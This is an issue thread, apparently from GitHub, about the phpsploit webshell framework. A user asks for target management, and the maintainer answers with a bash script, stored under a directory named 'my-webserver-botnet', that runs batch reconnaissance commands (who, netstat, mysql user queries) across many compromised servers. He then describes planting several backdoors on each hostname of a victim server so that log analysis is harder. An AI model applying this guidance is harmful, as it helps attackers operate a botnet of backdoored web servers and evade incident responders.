Feature request: database connection

[tristandostaler]

I was thinking that it would be interesting if the script had a databse and when we register targets it store them in it. Then we can list the targets with an ID and then select a target by ID. We could also be able to send a command to all the targets.

[nil0x42]

i ll meditate about this possibility ..

therefore there are some workarounds to do what you want:
for example, if you store your sessions in the same directory, you can script with bash, e.g:

FILE: ~/my-webserver-botnet/run.sh

#/bin/bash

session_dir="`dirname $0`"
batch="$session_dir/batch.phpsploit"
for session in $session_dir/*.session; do
    phpsploit -l "$session" -e "exploit; source $batch"
done

FILE: ~/my-webserver-botnet/batch.phpsploit

# display current target
set TARGET

# display info about who is connected in the machine
lrun 'echo "######## Connected people""'
run 'who'

lrun 'echo "######## Listening services (netstat -tlnp):"'
run netstat -tlnp

lrun 'echo "######## Remote mysql user""'
mysql 'select user()'

[nil0x42]

you must note that a TARGET doesn't necessarly represents a remote server.
for example, my personnal use case is to consider a phpsploit session file as a server access.
and, for stealth purposes, i use to specify more than 1 target for each session (you can use set TARGET + to put more than one target, and one of them will be randomly picked-up any time you run a command)

To clearify, if my remote server hosts victim.com, blog.victim.com and also xyz.org, i use to put one (or more) phpsploit backdoors in each of them, so i can set a lot of different phpsploit entry points, in different hostnames, making more difficult any log analysis.

for more infos:

phpsploit -e 'help set'

[tristandostaler]

I'll look into all that soon! Thanks!

[nil0x42]

I don't plan to implement database, therefore your use case (and my answer) revealed an advanced use-case that should be documented for next release.